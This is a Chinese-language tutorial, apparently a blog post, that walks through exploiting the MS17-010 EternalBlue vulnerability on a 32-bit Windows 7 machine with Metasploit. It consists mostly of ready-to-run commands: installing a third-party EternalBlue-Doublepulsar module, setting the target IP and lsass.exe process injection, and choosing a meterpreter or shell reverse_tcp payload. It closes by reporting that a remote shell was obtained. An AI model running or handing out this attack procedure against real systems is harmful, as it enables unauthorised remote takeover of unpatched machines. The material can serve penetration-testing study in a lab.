MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(二)

简介: MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

注意事项


64位Linux一般会自带一个Wine,名字是wine64,注意Wine32安装之后的名字是wine而非wine32。(可能有些系统会不同但几率不大)


附上卸载i386的方法


dpkg --remove-architecture i386


可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32


安装攻击32位操作系统所用的的脚本

首先下载利用的脚本:


git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

20190606205545496.png


下载下来之后要记得解压


8363223ad573436e93b0796dc4b9867a.png


然后将脚本拷贝到  /usr/share/metasploit-framework/modules/exploits/windows/smb


cd Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb


e7345d20a4414155be541877903a50b1.png


如上图所示,脚本下载并复制到SMB目录下成功

8.接下来我们使用exploit模块(步骤同上,原理同上)------已知靶机是32位的操作系统,我们用常32位的脚本来入侵操作系统


msfconsole
search eternalblue  #或者search ms17-010


aba9930db4374e6d920e016f3de8488c.png


3c339aded21f43158f97375caa393715.png

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.9


94753af257714fb7a0e342ecc7183420.png

show options   #查看设置的参数

457440a57e404031ae957daae69fd33e.png


设置payloads,特别注意和之前的payloads不同(去掉中间的X86,否则会失败)

set payload windows/meterpreter/reverse_tcp
exploit  #或者run   开始攻击,反弹shell


拓展:


第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)


第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)


25776383dd1649b79770d2f137a9029b.png


如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命令


查看到靶机的IP地址,还可以执行更多的命令..........


5833b309476d48fc855dc2d79ae92915.png



相关文章
|
1月前
|
Ubuntu Linux 数据安全/隐私保护
Windows上快速安装Linux子系统Ubuntu
Installing, this may take a few minutes...WslRegisterDistribution failed with error: 0x800701bcError: 0x800701bc WSL 2 ?????????????????? https://aka.ms/wsl2kernelPress any key to continue... 原因是 wsl1 升级到 wsl2 之后,内核却没有升级。 解决:下载最新的wsl安装包(wsl安装包)
|
1月前
|
Ubuntu Unix Linux
在Windows上轻松安装和使用Ubuntu的方法详解
继续点击“Continue”按钮以继续安装流程,随后选择清理磁盘并安装操作系统的选项。 接下来,在安装过程中,你需要选择时区。为了与你的地理位置相匹配,请选择中国上海作为你的时区设置。 在安装过程中,你还需要设置计算机的名称以及账号密码。请务必牢记这些信息,因为它们将作为你登录系统的凭证。
|
2月前
|
C语言 图形学 Windows
Windows下安装和配置GTK4(基于CLion)
本文介绍了作者选择GTK作为C语言图形库的原因,包括代码简洁、控件丰富和界面美观,并分享了在Windows环境下通过MSYS2安装GTK4及在CLion中配置开发环境的详细步骤。
284 0
|
2月前
|
Windows
Windows下版本控制器(SVN)-验证是否安装成功+配置版本库+启动服务器端程序
Windows下版本控制器(SVN)-验证是否安装成功+配置版本库+启动服务器端程序
102 2
|
2月前
|
运维 Linux 虚拟化
VMware虚拟机安装教程,Windows下安装VMware虚拟机,附VMware下载,Windows各版本系统镜像下载
虚拟机技术允许一台物理机运行多个操作系统,提升资源利用率,节省成本。通过快照、克隆等功能,实现系统快速恢复与复制,提高运维效率。本文详细介绍VMware虚拟机的安装步骤、Windows镜像下载及系统安装激活流程,适合初学者快速入门。
651 0
|
2月前
|
Linux Docker Windows
windows docker安装报错适用于 Linux 的 Windows 子系统必须更新到最新版本才能继续。可通过运行 “wsl.exe --update” 进行更新。
适用于 Linux 的 Windows 子系统需更新至最新版本(如 wsl.2.4.11.0.x64.msi)以解决 2025 年 Windows 更新后可能出现的兼容性问题。用户可通过运行 “wsl.exe --update” 或访问提供的链接下载升级包进行更新。
483 0